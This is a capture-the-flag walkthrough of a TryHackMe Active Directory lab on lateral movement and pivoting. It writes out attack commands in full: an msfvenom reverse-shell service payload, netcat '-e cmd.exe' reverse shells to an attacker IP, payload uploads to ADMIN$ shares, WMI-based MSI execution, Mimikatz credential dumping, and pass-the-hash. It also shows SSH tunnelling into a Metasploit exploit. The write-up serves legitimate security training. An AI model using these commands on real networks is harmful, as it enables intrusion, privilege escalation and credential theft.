Lateral Movement and Pivoting
- π Website: TryHackMe
- π₯ Level: Medium
- π₯οΈ OS: Windows / Active Directory
- π Link: Lateral Movement and Pivoting
βQuestion¶
After running the "flag.exe" file on t1_leonard.summers desktop on THMIIS, what is the flag?
π Walkthrough¶
First, I configured DNS for the TryHackMe Active Directory environment and obtained the generated credentials:
I connected to the jump host using SSH:
This gives us access to THMJMP2 as Jennifer.
For this task, we are also given another set of credentials:
The goal is to move laterally from the jump host to THMIIS.
I generated a reverse shell payload specifically formatted to run as a Windows service:
msfvenom -p windows/shell/reverse_tcp \
-f exe-service \
LHOST=10.150.74.22 \
LPORT=4444 \
-o hackservice.exe
The exe-service format matters because the payload will later be executed through the Windows Service Control Manager.
I uploaded the payload to the remote administrative share:
smbclient \
-c 'put hackservice.exe' \
-U t1_leonard.summers \
-W ZA \
'//thmiis.za.tryhackme.com/admin$/' \
EZpass4ever
The ADMIN$ share normally maps to:
so the payload is now available on the remote machine.
Next, I used Leonard's credentials with:
runas /netonly /user:ZA.TRYHACKME.COM\t1_leonard.summers "c:\tools\nc64.exe -e cmd.exe 10.150.74.22 4443"
The important part is:
This means the process keeps the local identity of the current user, but when accessing remote resources it authenticates using Leonard's credentials.
So even if:
still shows Jennifer, remote operations are performed as Leonard.
Using that network authentication context, I created a service remotely:
Then I started it:
Leonard is not directly becoming SYSTEM here.
Instead, Leonard has enough permissions to control the remote Service Control Manager.
The attack chain is:
Jennifer
β
runas /netonly with Leonard credentials
β
Leonard authenticates to THMIIS
β
Leonard can control the Service Control Manager
β
Create a malicious Windows service
β
Windows starts the service as LocalSystem
β
Reverse shell as NT AUTHORITY\SYSTEM
Windows services normally run as:
unless another service account is explicitly configured.
After obtaining access to THMIIS, I executed:
Answer
THM{MOVING_WITH_SERVICES}
βQuestion¶
After running the "flag.exe" file on t1_corine.waters desktop on THMIIS, what is the flag?
π Walkthrough¶
For the second lateral movement technique, the provided credentials are:
This time, instead of abusing Windows services, we use WMI.
I generated a malicious MSI package:
I uploaded it through SMB:
smbclient \
-c 'put hack.msi' \
-U t1_corine.waters \
-W ZA \
'//thmiis.za.tryhackme.com/admin$/' \
Korine.1994
The file is placed under:
I then created a PowerShell credential object:
$username = 't1_corine.waters';
$password = 'Korine.1994';
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force;
$credential = New-Object System.Management.Automation.PSCredential `
$username, $securePassword;
Next, I configured a CIM session using DCOM:
$Opt = New-CimSessionOption -Protocol DCOM
$Session = New-Cimsession `
-ComputerName thmiis.za.tryhackme.com `
-Credential $credential `
-SessionOption $Opt `
-ErrorAction Stop
Now I can invoke WMI methods remotely.
I used the Install method of Win32_Product to execute the MSI:
Invoke-CimMethod `
-CimSession $Session `
-ClassName Win32_Product `
-MethodName Install `
-Arguments @{
PackageLocation = "C:\Windows\hack.msi";
Options = "";
AllUsers = $false
}
The attack flow is:
Corine credentials
β
Remote CIM/WMI session
β
Win32_Product.Install
β
Malicious MSI executed remotely
β
Reverse shell on THMIIS
Once the shell arrives, I move to:
and list the directory:
I find:
Executing it:
returns the flag.
Answer
THM{MOVING_WITH_WMI_4_FUN}
βQuestion¶
What is the flag obtained from executing "flag.exe" on t1_toby.beck's desktop on THMIIS?
π Walkthrough¶
For this task, the generated credentials are:
The objective here is to perform lateral movement using alternate authentication material.
Instead of recovering Toby's plaintext password, we want to obtain his NTLM hash from memory and use it directly.
I started Mimikatz and elevated its token:
The output shows:
Mimikatz is now impersonating a SYSTEM token.
I tested access to protected credential material using:
and successfully obtained the local SAM information.
For example:
However, Toby is a domain user, so the local SAM is not the correct place to look.
Instead, I inspected active logon sessions:
Among the sessions, I found:
Authentication Id : 0 ; 534712
Session : RemoteInteractive from 3
User Name : t1_toby.beck
Domain : ZA
Logon Server : THMDC
The MSV credentials contain:
Username : t1_toby.beck
Domain : ZA
NTLM : 533f1bd576caa912bdb9da284bbc60fe
SHA1 : 8a65216442debb62a3258eea4fbcbadea40ccc38
DPAPI : d9cd92937c7401805389fbb51260c45f
The interesting value is Toby's NTLM hash:
Before using Pass-the-Hash, I reverted the SYSTEM impersonation token:
Then I launched a new process using Toby's NTLM hash:
sekurlsa::pth /user:t1_toby.beck /domain:za.tryhackme.com /ntlm:533f1bd576caa912bdb9da284bbc60fe /run:"c:\tools\nc64.exe -e cmd.exe 10.150.74.22 5555"
On my attacking machine:
I received a connection.
However:
returned:
Initially, this can look like the Pass-the-Hash failed.
It did not.
The process still has Felicia's local identity, while Toby's NTLM credentials are being used for network authentication.
Conceptually:
To actually use Toby's network credentials, I connected to THMIIS using WinRM:
Inside the remote shell:
now returned:
This happens because WinRM authenticates the remote connection using the NTLM material injected into the logon session.
The flow is:
Felicia
β
sekurlsa::pth with Toby's NTLM hash
β
New logon session containing Toby's authentication material
β
WinRM connection to THMIIS
β
Remote process created as Toby
I moved to:
and executed:
Answer
THM{NO_PASSWORD_NEEDED}
βQuestion¶
What flag did you get from hijacking t1_toby.beck's session on THMJMP2?
π Walkthrough¶
For the RDP session hijacking task, the generated credentials were:
I connected to THMJMP2 using RDP.
Once inside the graphical session, I opened cmd.exe as Administrator.
At this point, I was still logged in as:
but with elevated administrative privileges.
I then used PsExec to spawn a command prompt as SYSTEM.
After doing so:
returned:
The distinction here is important:
Administrators are highly privileged users, but NT AUTHORITY\SYSTEM is the local operating system account used by many Windows services and generally has even more local privileges.
Once running as SYSTEM, I enumerated the existing Terminal Services sessions:
or equivalently:
This shows both active and disconnected RDP sessions.
Windows can preserve a user's desktop even after the RDP connection itself has been disconnected.
This means that if another user's session still exists, it may be possible to attach to it rather than authenticating again.
After identifying Toby's session ID, I used:
as instructed by the room.
The important thing here is that I did not authenticate as Toby.
Instead, I attached my existing RDP connection to an already authenticated session belonging to Toby.
The attack chain is:
Abigail
β
Elevated command prompt
β
PsExec
β
NT AUTHORITY\SYSTEM
β
Enumerate existing RDP sessions
β
tscon
β
Hijack Toby's existing RDP session
Once inside Toby's session, I retrieved the flag.
Answer
THM{NICE_WALLPAPER}
βQuestion¶
What is the flag obtained from executing "flag.exe" on t1_thomas.moore's desktop on THMIIS?
π Walkthrough¶
For the port forwarding section, the generated credentials were:
I connected to the jump host:
The problem now is network reachability.
THMIIS exposes RDP on:
but that service is not necessarily directly reachable from my attacking machine.
THMJMP2, however, can reach it.
This makes the jump host useful as a pivot.
I used socat to create a TCP forward:
This means:
From my attacking machine, I can therefore connect to:
and the traffic is forwarded to the RDP service on THMIIS.
I connected using:
Although the RDP client connects to THMJMP2, the actual RDP session is established with THMIIS.
Conceptually:
Once logged in as Thomas, I executed:
from his desktop.
Answer
THM{SIGHT_BEYOND_SIGHT}
βQuestion¶
What is the flag obtained using the Rejetto HFS exploit on THMDC?
π Walkthrough¶
The final part of the room involves more complex port forwarding.
Some services on the internal network are not directly reachable from the attacker.
I created an SSH tunnel using:
ssh tunneluser@10.150.74.22 \
-R 8888:thmdc.za.tryhackme.com:80 \
-L '*:6666:127.0.0.1:6666' \
-L '*:7878:127.0.0.1:7878' \
-N
This command contains one remote forward and two local forwards.
The -N option tells SSH not to start an interactive shell, because the connection exists only to transport network traffic.
Remote forwarding¶
The following option:
creates a remote forward.
Conceptually:
This makes the internal web service on THMDC:80 accessible through the forwarded port.
Port 6666 forwarding¶
The following option:
is used so the compromised/internal host can reach the payload HTTP server running on the attacking side.
This is required by the Metasploit module because it needs to host additional payload content.
Port 7878 forwarding¶
The following option:
forwards the reverse shell callback through the tunnel.
Conceptually:
I selected the Rejetto HFS exploit in Metasploit:
I configured the payload:
Then:
The reverse shell is instructed to connect to THMJMP2:7878, which is then forwarded back to the attacking machine.
The exploit also needs to host a payload, so I configured:
The target is reached through the forwarded port:
I initially made a typo:
which Metasploit rejected:
After correcting the configuration, I launched:
Metasploit started the handler:
and hosted the malicious payload:
Eventually:
The returned shell was running on Windows.
I checked the current account:
which returned:
I listed the current directory:
and found:
Since pwd is a Unix/Linux command, it did not work in cmd.exe:
On Windows, commands such as:
or:
can be used instead.
Finally, I read the flag using:
Answer
THM{FORWARDING_IT_ALL}